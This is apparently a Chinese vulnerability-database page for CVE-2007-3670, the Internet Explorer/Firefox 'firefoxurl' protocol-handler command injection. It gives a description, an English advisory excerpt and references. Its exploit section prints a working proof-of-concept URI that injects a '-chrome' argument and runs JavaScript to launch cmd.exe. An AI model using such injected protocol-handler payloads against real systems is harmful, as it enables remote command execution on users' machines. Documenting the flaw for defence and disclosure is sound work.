Microsoft IE FirefoxURL协议处理器命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113281 漏洞类型 跨站脚本
发布时间 2007-07-10 更新时间 2009-05-05
CVE编号 CVE-2007-3670 CNNVD-ID CNNVD-200707-163
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-163
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。IE在安装了Firefox的机器上调用特定的协议处理器时存在命令注入漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意命令。在Windows系统上,如果安装了Firefox的话,Firefox会安装一些Mozilla专用协议(如FirefoxURL和FirefoxHTML)的协议处理器。如果Windows遇到了无法处理的URL协议,就会在Windows注册表中搜索适当的协议处理器,找到了正确的处理器后就会向其传送URL字符串,但没有执行任何过滤。假设在Windows系统上安装了Firefox且注册了FirefoxURL协议处理器,通常这个协议处理器的的shellopen命令如下:[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE-url"%1″-requestPending当InternetExplorer遇到了对FirefoxURLURL方案中内容的引用时,会以EXE镜像路径调用ShellExecute,并未经任何输入验证便传送了整个请求URI。以下请求:FirefoxURL://foo"argument"myvalue会导致使用以下命令行启动Firefox:"C:\PROGRA~1\MOZILL~2\FIREFOX.EXE"-url"firefoxurl://foo"argument"myvalue/"requestPending因此可以对firefox.exe进程指定任意参数,这就等于获得了-chrome命令行参数,因为攻击者可以指定任意Javascript代码,然后以可信任Chrome内容的权限执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/24837/info

Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.

An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.

Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access. 

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|参考资料

来源:US-CERT
名称:TA07-199A
链接:http://www.us-cert.gov/cas/techalerts/TA07-199A.html
来源:US-CERT
名称:VU#358017
链接:http://www.kb.cert.org/vuls/id/358017
来源:XF
名称:ie-firefoxurl-command-execution(35346)
链接:http://xforce.iss.net/xforce/xfdb/35346
来源:MISC
链接:http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.html
来源:MISC
链接:http://www.virusbtn.com/news/virus_news/2007/07_11.xml
来源:UBUNTU
名称:USN-503-1
链接:http://www.ubuntu.com/usn/usn-503-1
来源:MISC
链接:http://www.theregister.co.uk/2007/07/11/ie_firefox_vuln/
来源:SECTRACK
名称:1018360
链接:http://www.securitytracker.com/id?1018360
来源:SECTRACK
名称:1018351
链接:http://www.securitytracker.com/id?1018351
来源:BID
名称:24837
链接:http://www.securityfocus.com/bid/24837
来源:BUGTRAQ
名称:20070710InternetExplorer0dayexploit
链接:http://www.securityfocus.com/archive/1/archive/1/473276/100/0/threaded
来源:SUSE
名称:SUSE-SA:2007:049
链接:http://www.novell.com/linux/security/advisories/2007_49_mozilla.html
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/2007/mfsa2007-23.